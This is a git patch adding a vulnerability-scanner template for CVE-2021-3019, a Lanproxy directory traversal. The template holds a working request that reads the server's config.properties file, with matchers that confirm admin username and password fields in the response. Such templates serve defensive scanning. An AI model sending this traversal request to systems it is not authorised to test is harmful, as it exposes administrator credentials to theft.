From aa7420713b55c0d49ba92d84eadde9ca9656a82d Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 30 Jan 2021 12:22:35 +0000 Subject: [PATCH] Create CVE-2021-3019.yaml --- cves/2021/CVE-2021-3019.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2021/CVE-2021-3019.yaml diff --git a/cves/2021/CVE-2021-3019.yaml b/cves/2021/CVE-2021-3019.yaml new file mode 100644 index 0000000000..6463b737bb --- /dev/null +++ b/cves/2021/CVE-2021-3019.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-3019 + +info: + name: Lanproxy Directory Traversal + author: pikpikcu + severity: medium + + # Refrence: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019 + +requests: + - method: GET + path: + - "{{BaseURL}}/../conf/config.properties" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "application/octet-stream" + condition: and + part: header + - type: word + words: + - "config.admin.username" + - "config.admin.password" + condition: and + part: body